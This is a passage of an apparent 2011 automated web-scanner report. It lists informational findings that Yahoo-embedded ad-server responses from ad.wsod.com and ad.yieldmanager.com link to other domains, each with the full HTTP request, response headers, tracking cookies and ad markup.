<NOSCRIPT><a href="http://global.ard.yahoo.com/SIG=15nir1qgd/M=791401.14796848.14552986.4227981/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=otrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=6304038/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/?yhdata=ycg=&yyob=&zip=,&ybt=&" target="_blank" border="0" style="border:0px;"><img border="0" style="border:0px;" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.img.120x60/1315313288**;?yhdata=&ycg=&yyob=&zip=,&ybt=&" />
...[SNIP]...

15.27. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Flookup_@3Fs%3Dxss?yhdata=ycg=&yyob=&zip=,&ybt=&&click=http://global.ard.yahoo.com/SIG=15nir1qgd/M=791401.14796848.14552986.4227981/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=otrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=6304038/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.3746751663275063?yhdata=ycg=&yyob=&zip=,&ybt=&click=http://global.ard.yahoo.com/SIG=15nir1qgd/M=791401.14796848.14552986.4227981/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=otrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=6304038/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; expires=Fri, 07-Oct-2011 12:48:08 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1027

   function wsod_image1542() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15nir1qgd/M=791401.14796848.14552986.4227981/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=otrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=6304038/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.790.iframe.120x60/yhdata*ycg=|yyob=|zip=,|ybt=||**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Flookup_@3Fs=xss" target="_blank" title="Online $7 Trades! Click to find out more!"><img style="border:none;" src="http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60 ShinyNL.gif" alt="Online $7 Trades! Click to find out more!" /></a>
...[SNIP]...

15.28. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fq%3B_ylt%3DAsjqkoVImXcgcrWAEaC7OLbxVax_%3B_ylu%3DX3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs%3DXSS.F?yhdata=ycg=&yyob=&zip=,&ybt=&&click=http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.22285940730944276?yhdata=ycg=&yyob=&zip=,&ybt=&click=http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; i_34=2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L; expires=Fri, 07-Oct-2011 12:48:17 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1142

   function wsod_image1542() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.1206.iframe.120x60/yhdata*ycg=|yyob=|zip=,|ybt=||**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fq;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs=XSS.F" target="_blank" title="Online $7 Trades! Click to find out more!"><img style="border:none;" src="http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Tools.png" alt="Online $7 Trades! Click to find out more!" /></a>
...[SNIP]...

15.29. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /iframe3?XKUDAKjdGABqIpUAAAAAAKYuKAAAAAAAAAAQAIAAAAAAAAUAAgADCJ6uAQAAAAAAALM0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAgAAAAAAAAB7Z0aGlD8AAOwCYJrhPwAAAAAAAAAAAADsAmCa4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkoZaPCvuuCiHSoGGlzAQsR4Xln-gZOQV-mtGzAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p1aqg52%2FM%3D787833.14485997.14323832.8514476%2FD%3Dsports%2FS%3D25664825%3AMIP2%2F_ylt%3DAmg2OFI6cJlUlIgmD62T3F05nYcB%2FY%3DYAHOO%2FEXP%3D1315320488%2FL%3DsXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA%2FB%3DzdSRQtBDRmU-%2FJ%3D1315313288506222%2FK%3DY8q4t3xfDwCLgDPxHMEVwQ%2FA%3D6284797%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14485997%26Z%3D300x100%26_PVID%3DsXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA%26_salt%3D2535976306%26cb%3D1315313288506222%26i%3D140509%26r%3D0,79b28cc4-d886-11e0-bbc7-78e7d161369c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=sXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA&ad_type=iframe&ad_size=300x100&site=140509&section_code=14485997&cb=1315313288506222&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15p1aqg52/M=787833.14485997.14323832.8514476/D=sports/S=25664825:MIP2/_ylt=Amg2OFI6cJlUlIgmD62T3F05nYcB/Y=YAHOO/EXP=1315320488/L=sXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA/B=zdSRQtBDRmU-/J=1315313288506222/K=Y8q4t3xfDwCLgDPxHMEVwQ/A=6284797/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; bh="b!!!#N!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!#=3f9$!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; liday1=fh'jT*YKlx8SkUrhG%Lm!79C8>U9f4; ih="b!!!!/!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!%=3f<!!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; vuday1=@n$r!BKZI(BgvR.4M6EqoyOxB!!w[/!79C86pkAJ; pv1="b!!!!(!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!%L:B!2reF!'<Lw!#a.3!!QB($To(0!i=9S!!28s!(Y#b~~~~~~=3f<!=3p8(M.jTN!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q"; lifb=0EA2)A9.-B!6-Nb%>oc=M5Jkn/>M1M)lss@; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:15 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0013.rm.sp2
Set-Cookie: ih="b!!!!/!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!(=3f<(!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; path=/; expires=Thu, 05-Sep-2013 12:48:15 GMT
Set-Cookie: vuday1=@n$r!BKZI(BgvR04M6EqoyOxB!!w[/!79C8EwSZ(; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!(!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'<Lw!#a.3!!QB($To(0!i=9S!!28s!(Y#b~~~~~~=3f<(=3p8-M.jTN!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q"; path=/; expires=Thu, 05-Sep-2013 12:48:15 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: uid=uid=7cacde34-d886-11e0-bf43-78e7d15f7c8c&_hmacv=1&_salt=3048317464&_keyid=k1&_hmac=4e30118a521435cd0d9ac9ed0693e4e80810ea15; path=/; expires=Thu, 06-Oct-2011 12:48:14 GMT
Set-Cookie: lifb=0EA2)A9.-B!6-Nb'W00AM5Jkn/>M1M:>Rmw; path=/; expires=Tue, 13-Sep-2011 12:48:14 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:48:15 GMT
Pragma: no-cache
Content-Length: 1002
Content-Type: text/html
Age: 1
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9773674);}
</script><iframe src="http://view.atdmt.com/TR1/iview/332867993/direct/01?time=1315313295&click=http://ads.bluelithium.com/clk?3,eAGlUU2TmkAQ.TM5pQzDfDHDUnMYRN0RJoJi1sklxYJiWAi4sqW7vz4klFbu6UP36-7q19WvIfb4ISfFPicOpPyQ2cyDGOF9zuHefZ7Ynuc5LkIEU8Inu3AbyLAqFtI.qW4r.1po3sIR.fGJVLdk6JcymC6dt6E6WqTtW.f.YlAs74uGheXI1lyZiivl37mDnJpKEYO0HT0lZBWYXqfzWk.hT9NoHKU5-Z4WLzo1V.1hqLncJ8Xk2PfdAwBl3T5ntZW9FtZ7dmxbK28bsFELAWkHs1NJEdCCccYxtiAhnLouG8CgIcfI4nSoMQcE4ty1r.0ZbASijkM4og9axQj8eK97IZsSrebKyZf1tlZlEzgoxXOb.jK5D4ww8nG1ArNdLCCGFCObcA4icd59rcpFqOIZ6-S6q9LaulSJbvSxYNkLbeZtKX39JIEvPorNOun9YN1sv4DlSDO8mXNqOwghEArDT6TH10NwmUZlEF8f9ezbJQFSOIgT5jKwFjb4.OmmynjNP4r8BgX2pkQ=," frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="100"></iframe>
...[SNIP]...

15.30. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /iframe3?XKUDAHCNIABqIpUAAAAAAKYuKAAAAAAAAAAQAIAAAAAAAAUAAgADCJ6uAQAAAAAAALM0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAgAAAAAAAIBYzSd4lD8AAPCruVfhPwAAAAAAAAAAAADwq7lX4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADd5E4gCvuuCmn8vdUdl6S1TDMb1u7FHz62Qp-OAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15qi08f92%2FM%3D787833.14800347.14555521.14177427%2FD%3Dsports%2FS%3D25664825%3AMREC%2F_ylt%3DAjV6qkbscsOrHRx5YKOYi005nYcB%2FY%3DYAHOO%2FEXP%3D1315320488%2FL%3DsXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA%2FB%3D0tSRQtBDRmU-%2FJ%3D1315313288506222%2FK%3DY8q4t3xfDwCLgDPxHMEVwQ%2FA%3D6454134%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,B%3D10%26S%3D14800347%26Z%3D300x100%26_PVID%3DsXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA%26_salt%3D1959032721%26cb%3D1315313288506222%26i%3D140509%26r%3D0%26ycg%3D%26yyob%3D%26zip%3D,79ad9070-d886-11e0-b028-78e7d15f7c8c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=sXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA&ad_type=iframe&ad_size=300x100&site=140509&section_code=14800347&cb=1315313288506222&zip=&ycg=&yyob=&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15qi08f92/M=787833.14800347.14555521.14177427/D=sports/S=25664825:MREC/_ylt=AjV6qkbscsOrHRx5YKOYi005nYcB/Y=YAHOO/EXP=1315320488/L=sXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA/B=0tSRQtBDRmU-/J=1315313288506222/K=Y8q4t3xfDwCLgDPxHMEVwQ/A=6454134/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; lifb=0EA2)A9.-BM5Jkn/>M1M.hWHO; bh="b!!!#N!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!#=3f9$!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; pv1="b!!!!(!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'%o=!#:m/!#Ds0$To(/!i=9S!!28s!(=Q)~~~~~~=3f8u=3p6!M.jTN!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q"; liday1=fh'jT*YKlx8SkUrhG%Lm!79C8>U9f4; ih="b!!!!/!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!$=3f8u!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; vuday1=@n$r!BKZI(BgvR-4M6EqoyOxB!!w[/!79C8S3FdY; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:10 GMT
Server: YTS/1.18.4
